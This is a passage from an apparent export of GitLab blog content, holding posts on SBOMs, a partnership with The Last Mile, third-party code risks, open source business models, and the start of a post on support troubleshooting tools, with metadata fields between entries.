CycloneDX](https://cyclonedx.org/capabilities/sbom/)\n- [SPDX](https://spdx.dev/)\n\nGitLab uses CycloneDX for its SBOM generation because the standard is prescriptive and user-friendly, can simplify complex relationships, and is extensible to support specialized and future use cases. In addition, [cyclonedx-cli](https://github.com/CycloneDX/cyclonedx-cli#convert-command) and [cdx2spdx](https://github.com/spdx/cdx2spdx) are open source tools that can be used to convert CycloneDX files to SPDX if necessary.\n\n## Benefits of pairing SBOMs and software vulnerability management\n\nSBOMs are highly beneficial for DevSecOps teams and software consumers for several reasons:\n* They enable a standard approach to understanding what additional software components are in an application and where they are declared.\n* They provide ongoing visibility into the history of an application’s creation, including details about third-party code origins and host repositories.\n* They provide a deep level of security transparency into both first-party developed code and adopted open source software.\n* The details that SBOMs offer enable a DevOps team to identify vulnerabilities, assess the potential risks, and then mitigate them. \n* SBOMs can deliver the transparency that application purchasers now demand.\n\n## GitLab and dynamic SBOMs\n\nFor SBOMs to be fully impactful, organizations must be able to automatically generate them, connect them with application security scanning tools, integrate the vulnerabilities and licenses into a dashboard for easy comprehension and actionability, and update them continuously. GitLab supports all of these goals.\n\n![Dynamic SBOM management](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749673653/Blog/Content%20Images/Screenshot_2024-05-03_at_10.53.28_AM.png)\n\n### Scale SBOM generation and management\nTo comply with internal policies and regulations, it is key to have accurate and comprehensive SBOMs that cover open source, third-party, and proprietary software. To effectively manage SBOMs for each component and product version, a streamlined process is required for creating, merging, validating and approving SBOMs. GitLab’s [Dependency List feature](https://docs.gitlab.com/ee/user/application_security/dependency_list/) aggregates known vulnerability and license data into a single view within the GitLab user interface. Dependency graph information is also generated as part of the dependency scanning report. This empowers users to gain comprehensive insights into dependencies and risk within their projects or across groups of projects. Additionally, a JSON CycloneDX formatted artifact can be produced in the CI pipeline. This API introduces a more nuanced and customizable approach to SBOM generation. SBOMs are exportable from the UI, a specific pipeline or project, or via the GitLab API. \n\n### Ingest and merge SBOMs\nGitLab can ingest third-party SBOMs, providing a deep level of security transparency into both third-party developed code and adopted open source software. With GitLab, you can use a [CI/CD](https://about.gitlab.com/topics/ci-cd/) job to seamlessly merge multiple CycloneDX SBOMs into a single SBOM. Using implementation-specific details in the CycloneDX metadata of each SBOM, such as the location of build and lock files, duplicate information is removed from the resulting merged file. This data is also augmented automatically with license and vulnerability information for the components inside the SBOM.\n\n### Accelerate mitigation for better SBOM health\nBuilding high-quality products faster requires actionable security findings so developers can address the most critical weaknesses. GitLab helps secure your supply chain by [scanning for vulnerabilities](https://docs.gitlab.com/ee/user/application_security/secure_your_application.html) in source code, containers, dependencies, and running applications. GitLab offers full security scanner coverage from Static Application Security Testing (SAST), Dynamic Application Security Testing (DAST), container scanning, and software composition analysis (SCA) features to help you achieve full coverage against emerging threat vectors.\nTo help developers and security engineers better understand and remediate vulnerabilities more efficiently, [GitLab Duo](https://about.gitlab.com/gitlab-duo/) Vulnerability Explanation, an AI-powered feature, provides an explanation about a specific vulnerability, how it can be exploited, and, most importantly, a recommendation on how to fix the vulnerability. When combined with GitLab Duo Vulnerability Resolution, DevSecOps teams can intelligently identify, analyze, and fix vulnerabilities in just a matter of clicks.\n\nThe platform also supports creation of new policies (and [compliance enforcement](https://docs.gitlab.com/ee/administration/compliance.html)) based on newly detected vulnerabilities. \n\n### Continuous SBOM analysis \nGitLab Continuous Vulnerability Scanning triggers a scan on all projects where either container scanning, dependency scanning, or both, are enabled independent of a pipeline.  When new Common Vulnerabilities and Exposures (CVEs) are reported to the National Vulnerability Database (NVD), users don’t need to re-run their pipelines to get the latest feeds. GitLab’s Vulnerability Research Team adds them to GitLab’s Advisory Database and those advisories are automatically reported up to GitLab as vulnerabilities. This makes GitLab’s SBOM truly dynamic in nature. \n\n### Building trust in SBOMs\nOrganizations that require [compliance functionality](https://about.gitlab.com/solutions/compliance/) can use GitLab to [generate attestation for all build artifacts](/blog/securing-the-software-supply-chain-through-automated-attestation/) produced by the GitLab Runner. The process is secure because it is produced by the GitLab Runner itself with no handoff of data to an external service.\n\n## The future of GitLab SBOM functionality\n\nSoftware supply chain security continues to be a critical topic in the cybersecurity and software industry due to frequent attacks on large software vendors and the focused efforts of attackers on the open source software ecosystem. And although the SBOM industry is evolving quickly, there are still concerns around how SBOMs are generated, the frequency of that generation, where they are stored, how to combine multiple SBOMs for complex applications, how to analyze them, and how to leverage them for application health.\n\nGitLab has made SBOMs an integral part of its [software supply chain direction](https://about.gitlab.com/direction/supply-chain/) and continues to improve upon its SBOM capabilities within the DevSecOps platform, including planning new features and functionality. Recent enhancements to SBOM capabilities include the automation of attestation, digital signing for build artifacts, and support for externally generated SBOMs.\n\nGitLab has also established a robust [SBOM Maturity Model](https://handbook.gitlab.com/handbook/security/security-assurance/dedicated-compliance/sbom-plan/) within the platform that involves steps such as automatic SBOM generation, sourcing SBOMs from the development environment, analyzing SBOMs for artifacts, and advocating for the digital signing of SBOMs. GitLab also plans to add automatic digital signing of build artifacts in future releases. \n\n## Get started with SBOMs\n\nThe demand for SBOMs is already high. Government agencies increasingly recommend or require SBOM creation for software vendors, federal software developers, and even open source communities.\n\n> To get ahead of this requirement, check out the SBOM capabilities for GitLab Ultimate in [GitLab’s DevSecOps platform](https://gitlab.com/-/trials/new).\n\n## SBOM FAQ\n\n**What is an SBOM?**\n\nAn SBOM is a detailed inventory that lists all components, libraries, and tools used in creating, building, and deploying software. This comprehensive list goes beyond mere listings to include vital information about code origins, thus promoting a deeper understanding of an application's makeup and potential vulnerabilities.\n\n**Why are SBOMs important?**\n\nSBOMs are crucial for several reasons. They provide:\n- Insight into dependencies: Understanding what makes up your software helps identify and mitigate risks associated with third-party components.\n- Enhanced security: With detailed visibility into application components, organizations can pinpoint vulnerabilities quickly and take steps to address them.\n- Regulatory compliance: Increasingly, regulations and best practices recommend or require an SBOM for software packages, particularly for those in the public sector.\n- Streamlined development: Developers can lean on an SBOM for insights into used libraries and components, saving time and reducing errors in the development cycle.\n\n**What standards are used for SBOM data exchange?**\n\nThere are two predominant standards:\n- CycloneDX: Known for its user-friendly approach, CycloneDX simplifies complex relationships between software components and supports specialized use cases.\n- SPDX: Another widely used framework for SBOM data exchange, providing detailed information about components within the software environment.\n\nGitLab specifically employs CycloneDX for its SBOM generation because of its prescriptive nature and extensibility to future needs.\n\n**What is GitLab’s approach to SBOMs?**\n\nGitLab emphasizes the creation of dynamic SBOMs that can be:\n- Automatically generated: Ensuring up-to-date information on software composition.\n- Integrated with tools: Connecting to vulnerability scanning tools for thorough risk assessment.\n- Easily managed: Supporting ingestion and merging of SBOMs for comprehensive analysis.\n- Continuously analyzed: Offering ongoing scanning of projects to detect new vulnerabilities as they emerge.\n\n**How can I start implementing SBOMs in my organization?**\n\nFor organizations ready to adopt SBOMs, GitLab’s Ultimate package provides a robust platform for generating and managing SBOMs within a DevSecOps workflow. By leveraging GitLab’s tools, teams can ensure compliance, enhance security, and optimize development practices.\n\nThe increasing demand for SBOMs reflects the growing emphasis on software security and supply chain integrity. By integrating SBOM capabilities, organizations can better protect themselves against vulnerabilities and comply with emerging regulations.\n\n> [Try GitLab Ultimate free for 30 days today.](https://about.gitlab.com/free-trial/devsecops/)\n\n_Disclaimer This blog contains information related to upcoming products, features, and functionality. It is important to note that the information in this blog post is for informational purposes only. Please do not rely on this information for purchasing or planning purposes. As with all projects, the items mentioned in this blog and linked pages are subject to change or delay. The development, release, and timing of any products, features, or functionality remain at the sole discretion of GitLab._",[865,867,753,9,184],"2024-05-02",{"slug":4888,"featured":6,"template":689},"the-ultimate-guide-to-sboms","content:en-us:blog:the-ultimate-guide-to-sboms.yml","The Ultimate Guide To Sboms","en-us/blog/the-ultimate-guide-to-sboms.yml","en-us/blog/the-ultimate-guide-to-sboms",{"_path":4894,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4895,"content":4901,"config":4906,"_id":4908,"_type":14,"title":4909,"_source":16,"_file":4910,"_stem":4911,"_extension":19},"/en-us/blog/thelastmile-gitlab",{"title":4896,"description":4897,"ogTitle":4896,"ogDescription":4897,"noIndex":6,"ogImage":4898,"ogUrl":4899,"ogSiteName":673,"ogType":674,"canonicalUrls":4899,"schema":4900},"Inside the collaboration between GitLab and The Last Mile","GitLab teamed up with The Last Mile to bring open source DevOps and tech mentorship to incarcerated populations across the United States.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681743/Blog/Hero%20Images/tlm-blogpost-banner.png","https://about.gitlab.com/blog/thelastmile-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Inside the collaboration between GitLab and The Last Mile\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Christina Hupy, Ph.D.\"}],\n        \"datePublished\": \"2020-11-13\",\n      }",{"title":4896,"description":4897,"authors":4902,"heroImage":4898,"date":3635,"body":4904,"category":10,"tags":4905},[4903],"Christina Hupy, Ph.D.","\n\n[The Last Mile (TLM)](https://thelastmile.org/), an organization focused on changing lives through technology, is tackling the daunting problem of mass incarceration in the United States by providing education and career training opportunities to incarcerated individuals to help break the generational cycle of incarceration. GitLab team members with similar passions and ideas connected with The Last Mile team and built a partnership to help bring the tech industry and mentorship directly to incarcerated individuals.\n\n## AMA to Coffee Chat to Partnership\n\nThe idea for TLM partnership originated during an AMA (or \"Ask Me Anything\" session) between GitLab CEO, [Sid Sijbrandij](/company/team/#sytses), and GitLab team members. [In one of these AMAs](https://www.youtube.com/watch?v=qi9zrymBO8o), [Tucker Logan](/company/team/#tuckcodes), a federal solutions architect at GitLab, asked Sid about the inspiration behind his [tweet](https://twitter.com/sytses/status/1227319454817804288) about mass incarceration. In a follow-up question, [Morgen Smith](/company/team/#msmith6), a sales development representative (SDR) for the Americas, asked Sid if GitLab would consider creating initiatives to help combat the school-to-prison pipeline.\n\nAs a former educator, Morgen has witnessed first-hand the national trend of disadvantaged youth being agressively disciplined in schools, which can then lead to juvenile offenses and later to formal charges. During the AMA, Morgen asked Sid: \"What do you think GitLab could do to encourage minority youth in this situation to be inspired by opportunities in tech?\" Sid shared his support and passion for the topic, and invited Morgen and Tyler to host an [open coffee chat](/company/culture/all-remote/informal-communication/#coffee-chats) on the topic to brainstorm ideas and next steps.\n\nDuring the coffee chat, Sid decided to take the smallest step, first. He visited San Quentin State Prison in San Rafael, Calif., and organized a call with Chris Redlitz, a co-founder of TLM. It turns out that TLM was using GitLab internally and also using the GitLab Community Edition to train nearly 300 students participating in their programs about how to use DevOps.\n\nTLM is a nonprofit program that started at San Quentin. TLM works with the incarcerated populations at men’s, women’s, and young adult correctional facilities to help them build relevant skills in technology with the goal of preparing individuals for successful reentry and building careers in business and technology. Today, TLM is in 23 classrooms across six states and has served 622 students since its inception.\n\n## TLM students learn DevOps with GitLab\n\nParticipants in TLM use the self-managed, free open core version of GitLab in their courses on Web Development. Each of the twenty individual classrooms have their own self-managed instance which around 20 students use to create and host their own private repositories. The sandbox environments are deployed centrally via Google Cloud. The core curriculum includes HTML/CSS and JavaScript, Node.js, Express.js, React.js, and Mongodb. GitLab is used primarily as a [source code management tool](/solutions/source-code-management/) for the students. Students write and commit code to personal repositories during course assignments. TLM Remote Instruction team also manages student-facing GitLab repositories to demonstrate industry best practices in merging, code collaboration, and version control platforms. Additionally, TLM leverages GitLab by providing students access to their repositories after they are released from prison, preserving commit history and all version control for the aspiring coders.\n\n\"By utilizing GitLab, The Last Mile students become comfortable using a best-in-class open source DevOps tool,\" says Tulio Cardozo, IT Manager, TLM. \"This experience empowers our students as aspiring software engineers, enabling them to enter the workforce with the collaboration and communication framework skills employers demand.\"\n\nThe GitLab team is partnering with the TLM Programs department to organize a series of webinars and workshops for the students. The first webinar kicked off in June of 2020 and was broadcast to 27 students (men, women, and youth programs), across four classrooms in several states. The topic was an introduction to GitLab and DevOps. Sid joined and shared the story of founding GitLab and his journey in tech. [Brendan O’Leary](/company/team/#brendan), a senior developer evangelist at GitLab, provided an overview of DevOps and explained how GitLab is the first single application for the entire DevOps lifecycle.\n\n\"The students appreciated the information on how to get started as new developers. Sid and Brendan helped the students believe they could accomplish anything with enough hard work,\" says a classroom facilitator from the Pendleton Youth Correctional Facility in Indiana.\n\nThe TLM team added that the webinar exposed students to a large company that works remotely and introduced them to an industry-recognized brand that the students use. In addition to the value of the content itself, there was a Q&A portion of the session where the studetns asked questions about the technology itself, such as how to start an open-source project and protecting intellectual property in open source, and about the facilitators' personal journey into tech.\n\nWatch the webinar with GitLab and TLM below.\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n \u003Ciframe src=\"https://www.youtube-nocookie.com/embed/ejHmvMjXJVU\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\nIn addition to the general workshop, the teams also collaborated on more technical content. The students at the Pendleton Juvenile Correctional Facility had a very special guest visit their [Web Development Fundamentals Course](https://thelastmile.org/our-work/), [Natalia Tepluhina](/company/team/#ntepluhina). Natalia, who currently lives in the Ukraine, is a frontend engineer at GitLab and also serves as a [core Vue.js team member](https://vuejs.org/v2/guide/team.html) and [core team member](/community/core-team/) of GitLab itself. Natalia answered a variety of questions about how to approach learning Javascript and provided a few demos related to specific questions from the students.\n\n## Mentorship for a career in DevOps\n\nGitLab and TLM also partnered on a series of Technical recruiting workshops with the classrooms. These have definitely been one of the highlights of the partnership thus far. In these workshops, a GitLab recruiter gave a presentation on the technical recruiting processes at GitLab, best practices during the application process and interview process, as well as an overview of what to expect during an interview. During each of the four sessions, the recruiters directly engaged with the participants, who asked a variety of questions, including:\n\n* How do I address incarceration on my resume?\n* What about background checks?\n* How do I gain professional experience while incarcerated?\n\nThe GitLab recruiting team was very sensitive to the participants' concerns and provided honest, clear answers, and great suggestions. The recruiters shared that during the process candidates should think of their recruiter as a resource, and they can always ask to speak to the People team at GitLab in confidence if it would help reassure them with any concerns they have regarding their criminal records. The recruiters encouraged the students to highlight their work in TLM courses on their resume and think about whether they can use course projects to start to build a portfolio. In addition, the facilitators encouraged participants to think about contributing to open source projects as a way to build technical skills, increase their network and mentorship opportunities.\n\n## How can open source help incarcerated populations gain experience in tech?\n\nThe discussion around contributing to open source projects as a way to build technical skills sparked a few different exciting ideas with the teams. One of these ideas was to hold a first time contributor workshop with alumni from TLM. The workshop was held in September 2020 had 16 alumni participants, four GitLab team members, including Sid, and five TLM team members. The workshop covered the basics on how to contribute to GitLab and demonstrated the step-by-step process. Participants were [provided an issue](https://gitlab.com/gitlab-org/gitlab/-/issues/247284) with a list of simple fixes with the label [\"good-for-new-contributors\"](https://gitlab.com/groups/gitlab-org/-/labels?utf8=%E2%9C%93&subscribed=&search=good+for+new+contributors) in the GitLab docs or handbook with typos or other minor changes. We had a few merge requests after just a few hours of the workshop! Participants were encouraged to tag GitLab team members for recognition and to win a pair of tanuki socks – by the end of the week we had given away six pairs of socks.\n\nParticipants and instructors appreciated the opportunity to learn in a hands-on way during the workshop:\n\n\"Thank you for the opportunity to participate in the GitLab workshop. I am so grateful to the GitLab staff for taking the time to introduce those of us who are new to GitLab to the history and functionality of the company. I learned so much, not just about how I can utilize GitLab to accomplish personal tasks more efficiently, but also how I can contribute and collaborate more with others and contribute to my local and global communities.\" - TLM staff and alumna.\n\nThe GitLab team found the experience equally rewarding. \"Working with The Last Mile was such a rewarding experience! When I think about how our product takes in contributions from all over the world and knowing it is also leveraged by those currently and or previously incarcerated really shows how truly 'inclusive' Git can be. Additionally, the empowerment it offers and the gift of knowledge and skill that can't be taken away is invaluable,\" says [Candace Brydsong Williams](/company/team/#cwilliams3), manage of the Diversity, Inclusion and Belonging program at GitLab.\n\n## How TLM uses GitLab technology\n\nGitLab also provides free licenses of our top-tier hosted application for the TLM team, who use our DevOps technology in nearly every aspect of their operations.\n\nTLM transitioned from GitHub to GitLab in 2019 after we provided the licenses. Initially, GitLab was used primarily in TLM's engineering department to track all internal processes with issues and Wikis. Infrastructure as code data and internal information is stored in repositories. Soon, TLM adopted GitLab technology in their education and programs departments, where it is now being used for project management. TLM now uses sprint planning, milestones, issues, priority levels, burndown charts, and issues boards to streamline project management across their departments.\n\nThe Last Mile has introduced numerous new and distinct use cases for GitLab. These include:\n\n* Issues are used to manage classroom facilities including to keep track of the impacts of COVID-19 on each classroom. For example, status updates are recorded on the issue and in the comments.\n* [The Last Mile’s reentry program](https://thelastmile.org/our-work/#reentry) uses GitLab to track returned citizen onboarding and service delivery process as well as tracking internal workloads, task efforts, and collaboration across teams. To-do lists are used to manage actions and labels are used to view the status of various efforts.\n\n\"The GitLab platform provides The Last Mile with a remarkable range of solutions -- from our application of GitOps workflows for managing our hybrid infrastructure, to our org-wide application of issues across teams,\" says Mike Bowie, Director of Engineering, The Last Mile. \"By solving such a broad range of our needs, GitLab enables us to focus on delivering value into our programs, instead of administering and maintaining a plethora of disparate tools.\"\n",[9,910,779,803,1036],{"slug":4907,"featured":6,"template":689},"thelastmile-gitlab","content:en-us:blog:thelastmile-gitlab.yml","Thelastmile Gitlab","en-us/blog/thelastmile-gitlab.yml","en-us/blog/thelastmile-gitlab",{"_path":4913,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4914,"content":4920,"config":4925,"_id":4927,"_type":14,"title":4928,"_source":16,"_file":4929,"_stem":4930,"_extension":19},"/en-us/blog/third-party-code-risks",{"title":4915,"description":4916,"ogTitle":4915,"ogDescription":4916,"noIndex":6,"ogImage":4917,"ogUrl":4918,"ogSiteName":673,"ogType":674,"canonicalUrls":4918,"schema":4919},"4 Risks to consider when implementing third-party code","Third-party code is a great resource for businesses, but comes with a number of risks. Explore four ways developers can keep their code secure.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680662/Blog/Hero%20Images/third-party-code-risks.jpg","https://about.gitlab.com/blog/third-party-code-risks","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"4 Risks to consider when implementing third-party code\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Vanessa Wegner\"}],\n        \"datePublished\": \"2019-07-16\",\n      }",{"title":4915,"description":4916,"authors":4921,"heroImage":4917,"date":4922,"body":4923,"category":682,"tags":4924},[1916],"2019-07-16","\n\nManaging a complex ecosystem of software and partnerships is a fundamental need\nfor today’s businesses. Most enterprises run hundreds of mission-critical apps,\nmany of which are either out-of-the-box or customized third-party solutions.\nThe benefit of third-party software is clear: It saves time, resources, and\nallows you to implement new capabilities quickly, efficiently, and at scale.\n\nUnfortunately, with great reward comes some risk. Many of last year’s most\nsignificant breaches – like CSC, Best Buy, and Delta – were due to missed\nvulnerabilities in the company's third-party applications. For example, Best Buy suffered a breach\nvia their online chat service, [24]7.ai, [which had stored BestBuy customer\npayment data on its servers](https://www.pcmag.com/news/360306/best-buy-suffers-customer-payment-data-breach).\n\nBringing on new, third-party software can be an exciting step forward for your\nworkload and projects, allowing you to add new capabilities, build on the open source\ncommunity, and leverage some of the best code out there. However, each new\npartnership creates an opportunity for hackers to access your systems and\ndata. Even if your vendors claim to be secure, their code might not necessarily\nlive up to the security standards and compliance requirements of your business.\nDevelopers can’t leave all risk management up to their security counterparts;\ndevelopers need to share that responsibility just as they share responsibility\nfor writing their own secure code.\n\n## Risks developers should know about third-party code\n\n1. As Bogdan Rancea writes, open source code fragments are downloaded hundreds\nor thousands of times a day – [and not everyone is contributing secure code or\nmaintaining a secure code sharing system](https://ecommerce-platforms.com/articles/the-dangers-of-third-party-code-dependency).\nThe more complex the code, the easier it is for a few lines of malicious code\nto go undetected.\n1. Rigorous testing is often overlooked for third-party code. If third-party code touches your\ndata, it should be tested – but many businesses either don’t test or complete the\nbare minimum required by their compliance teams.\n1. Standard third-party script tracking is documented, but [there may be\nadditional tracking that isn’t disclosed](https://css-tricks.com/potential-dangers-of-third-party-javascript/).\nThese scripts may be collecting data across your website and apps, storing\npersonally identifiable information from your customers as they engage with your business.\n1. When a breach occurs, your brand will be held responsible. When your\ncustomers’ data is at stake, it doesn’t matter if the breach happens on\nthird-party soil; if it’s your data, it’s your problem.\n\n## Protect your company and customers by planning ahead\n\nWhile a breach may be inevitable, the disastrous aftermath isn’t. Proactive\nsecurity measures in third-party relationships can save your company a lot of\nheartache in the long run, and developers are well suited to lead the charge.\nHere are a few best practices to follow:\n\n### 1. Take inventory of all of your current third-party relationships\n\nBegin with where you are now: Create a list of every third-party program used across your\ncompany. Make sure you know what code is being used, who the contact person is\nboth internally and at the vendor (if applicable), and understand what data is\nbeing accessed or stored by the third party. You may choose to pursue security\nconversations and testing with certain vendors based on the classification of\nthe data they work with, making an inventory of third-party relationships a valuable tool to prioritize.\nOnce your inventory is complete, it may be useful to consider a third-party or\nopen source code audit to thoroughly investigate your code ecosystem.\n\n### 2. Work with security to create formal requirements for all new third parties\n\nEstablishing standards will allow your team to vet potential collaborators and\nensure that any new software or code isn’t posing an unnecessary risk to your\nbusiness. It will also help to serve as a requirements guide during the\nprocurement process and can mitigate internal conflict when trying to get new tools\napproved. If you’re unsure where to start, begin by looking at the\nrequirements of all the legal regulations that apply to your business, such as\nGDPR. You could also look at how the third-party code or tools will interact\nwith your data, systems, and software and create requirements based on what\nwill help you best protect the business.\n\n### 3. Take on a security mindset: It’s everyone’s responsibility\n\nWhen hackers are trying to find any possible way in, it’s important that your entire\norganization – not just the security department – feels responsible for and capable of\ncontributing to your company’s security posture. Widespread security awareness\nwill hopefully make security a priority whenever a team is evaluating a new\ntool or code fragment.\n\n### 4. Data encryption: Start your security practices with the data\n\nSet policies to protect data based on certain trigger actions – like the creation\nof data or external sharing – or based on the level of data sensitivity. By making\nencryption a standard practice across all systems, you’re adding a layer of\nsecurity that requires identity-based authentication, which can give insight to\nwho is accessing your data and when. Moreover, any stolen data will only be\nuseful to hackers if it can be decrypted.\n\nCover image by [Kelly Sikkema](https://unsplash.com/@kellysikkema?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com/collections/4571277/programming?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)\n{: .note}\n",[9,865],{"slug":4926,"featured":6,"template":689},"third-party-code-risks","content:en-us:blog:third-party-code-risks.yml","Third Party Code Risks","en-us/blog/third-party-code-risks.yml","en-us/blog/third-party-code-risks",{"_path":4932,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4933,"content":4939,"config":4944,"_id":4946,"_type":14,"title":4947,"_source":16,"_file":4948,"_stem":4949,"_extension":19},"/en-us/blog/thoughts-on-open-source",{"title":4934,"description":4935,"ogTitle":4934,"ogDescription":4935,"noIndex":6,"ogImage":4936,"ogUrl":4937,"ogSiteName":673,"ogType":674,"canonicalUrls":4937,"schema":4938},"What to consider with an open source business model","CEO Sid Sijbrandij discusses the role of transparency and contribution in an open source business model.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682919/Blog/Hero%20Images/opensourcecover.jpg","https://about.gitlab.com/blog/thoughts-on-open-source","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What to consider with an open source business model\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Valerie Silverthorne\"}],\n        \"datePublished\": \"2019-07-05\",\n      }",{"title":4934,"description":4935,"authors":4940,"heroImage":4936,"date":4941,"body":4942,"category":10,"tags":4943},[1273],"2019-07-05","\nAn open source business model used to be relatively rare but successes at companies like Red Hat and our own have changed that. As the idea of open source continues to gain traction with startups, our CEO [Sid Sijbrandij](/company/team/#sytses) talked with [OSS Capital](https://oss.capital) founder Joseph “JJ” Jacks about some of the changing – and nuanced – requirements to play in this complicated and competitive space.\n\n## How to build a business model for open source software businesses\n\nOpen source has always required a social contract between the owners of the project and the community that uses and contributes to it, Sid explains, and that’s something GitLab benefited from when the company was experimenting with the idea of [how to get paid](/blog/monetizing-and-being-open-source/). But today, with an [“open core” business model](/blog/gitlab-is-open-core-github-is-closed-source/) involving both open source and proprietary code, there’s another level, one where the community can have a much bigger voice on releases. “How much of what you make ends up in the open source and how much is proprietary?” Sid asks. “We try to find a good balance then when we go for a few releases where we're a bit weak on the open source side, people will post comments on our blog post and we can point to the stuff that's coming down the pipe. The wider community keeps us honest.”\n\nJJ, whose company is focused on investing in commercial open source startups, asks Sid about the ways open source licensing has changed. It’s a broad landscape, Sid offers: “You can go from the free software movement to open source to open core to these new licenses that are now made by Redis and Mongo and Confluent, the so-called non-compete licenses, which say it's kind of open source except if you're a hyper cloud, then you have to pay us.”\n\nThe “freemium” business model has also come along. “(That) makes it very easy to get trials and you can use it for free for a long time, but it's commercial. And then you have the completely proprietary Oracle light model. So licensing is much more of a spectrum today.”\n\n> The wider community keeps us honest.\n\n## Time to contribute\n\nThe spectrum of licensing isn’t necessarily a bad thing. Sid points to the free software movement that requires a user to contribute as a positive sign, but admits there is still a long way to go before this behavior is second nature. Companies try to put restrictions in, or to enforce things via copyright, Sid says, “but we’re not there yet, not by a long stretch. Lots of car manufacturers don’t contribute back to Linux so please start doing that everyone.”\n\nOf course, contributions from the community can only take a company so far. “Open core allowed us to compete with the proprietary vendors,” Sid says. “GitLab would not have survived as an open source project because open source projects sometimes implode under their popularity. There are some great examples of projects that did well – Kubernetes, Linux, and PostgreSQL – but without our business model we would not be able to compete at this point in this market with Microsoft and Atlassian.”\n\n> Open core allowed us to compete with the proprietary vendors.\n\n## Transparency in all things\n\nJJ wonders how much transparency and expectation setting have helped GitLab as an open core company, and Sid’s quick to point out it’s essential. “[Transparency](https://handbook.gitlab.com/handbook/values/#transparency) is in our top three values and we started with that because we didn’t want to alienate the wider community.” Transparency shortens the feedback loop and makes it more straightforward to deal with mistakes or challenging situations. When we [decided to merge both of GitLab’s code bases](/blog/merging-ce-and-ee-codebases/), we did it openly and honestly, wrote a blog post about it, and then waited to see how it was received. “I think by being transparent about our plan up front, what could have turned into a big flame war was a really positive experience for both the people at the company working really hard on this project, but also the wider community feeling like we take their interests seriously. And if we would have made a mistake, this was a proposal. They could have just said, ‘Okay, you're making a mistake here and there,’ and we could have fixed it before people were upset, and we lost trust.”\n\nWould Sid recommend “transparency first” to a startup open core company? Absolutely and it has to be there from the beginning, he says. “Values are really hard to introduce later in a company. I'm pushing for a bit more transparency now, and it's super, super, super, super hard. So, if you plan to do it, do it from the start, and (understand) it feels very counterintuitive to be open. And there are some areas where it's naturally harder to be as transparent. Security comes to mind. So, it's a daily struggle. People see that it works, but it requires effort at any layer of the company to actually do it, but I'm really proud of how far we've come.”\n\n_GitLab CEO Sid Sijbrandij occasionally sits down for a \"[pick your brain](/handbook/eba/ceo-scheduling/#pick-your-brain-meetings)\"\nmeeting with people seeking advice on open source, remote work, or a discussion of other things related to GitLab. Read [other posts in the series here](/blog/tags.html#pick-your-brain)._\n\nCover image by [Natasha Miller](https://unsplash.com/@tashography?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com)\n{: .note}\n",[267,779,9,9],{"slug":4945,"featured":6,"template":689},"thoughts-on-open-source","content:en-us:blog:thoughts-on-open-source.yml","Thoughts On Open Source","en-us/blog/thoughts-on-open-source.yml","en-us/blog/thoughts-on-open-source",{"_path":4951,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4952,"content":4958,"config":4964,"_id":4966,"_type":14,"title":4967,"_source":16,"_file":4968,"_stem":4969,"_extension":19},"/en-us/blog/three-new-support-tools",{"title":4953,"description":4954,"ogTitle":4953,"ogDescription":4954,"noIndex":6,"ogImage":4955,"ogUrl":4956,"ogSiteName":673,"ogType":674,"canonicalUrls":4956,"schema":4957},"We've open sourced 3 tools to help troubleshoot system performance","Say hello to the open source tools our Support team is using to better summarize customer performance data – and find out how they can help you.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749670405/Blog/Hero%20Images/open_source_tools.jpg","https://about.gitlab.com/blog/three-new-support-tools","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"We've open sourced 3 tools to help troubleshoot system performance\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Will Chandler\"},{\"@type\":\"Person\",\"name\":\"Sara Kassabian\"}],\n        \"datePublished\": \"2019-07-24\",\n      }",{"title":4953,"description":4954,"authors":4959,"heroImage":4955,"date":4961,"body":4962,"category":801,"tags":4963},[4960,927],"Will Chandler","2019-07-24","\nOur self-managed customers often encounter issues related to performance, or the time it takes to execute something. In the past, the [Support team](/handbook/support/) had to pull data from disparate sources and cobble it together in order to analyze performance-related issues.\n\n“We’re dealing with someone else’s computer on support, so we have to be able to handle environments with limited observability,” says [Will Chandler](/company/team/#wchandler), senior support engineer. “We’re at the mercy of their infrastructure. That’s why the team has made tools to reduce the friction.”\n\n“With [GitLab.com](/pricing/), we have all of this fancy tooling that helps us collect performance data,” says [Lee Matos](/company/team/#leematos), support engineering manager. “But when we’re working with customers, we need to be ready to bring lightweight tools that don’t require a lot of setup that we can use based on what they have in place.”\n\nThe Support team is working on becoming more data driven by using three new tools designed to aggregate and summarize performance data for self-managed customers. A focus on data-driven decision-making improves the customer relationship and demonstrates our commitment to making performance a key feature of GitLab.\n\nWe'll look at three open source tools created by GitLab Self-Managed Support. Strace parser is a general tool that could be of use to anyone, while JSON Stats and GitLabSOS are tailored to GitLab, but could be easily modified.\n\n## 1. [Strace parser](https://gitlab.com/gitlab-com/support/toolbox/strace-parser)\n\n[Strace](https://gitlab.com/strace/strace) is a commonly used debugging and diagnostic tool in Linux that captures information about what’s happening inside processes running on our customers’ environments.\n\nUnlike [newer](http://man7.org/linux/man-pages/man1/perf.1.html) and [more powerful](https://github.com/iovisor/bpftrace) tracing tools, strace adds [significant overhead to a process](http://www.brendangregg.com/blog/2014-05-11/strace-wow-much-syscall.html). However, strace is generally available even on very old versions of 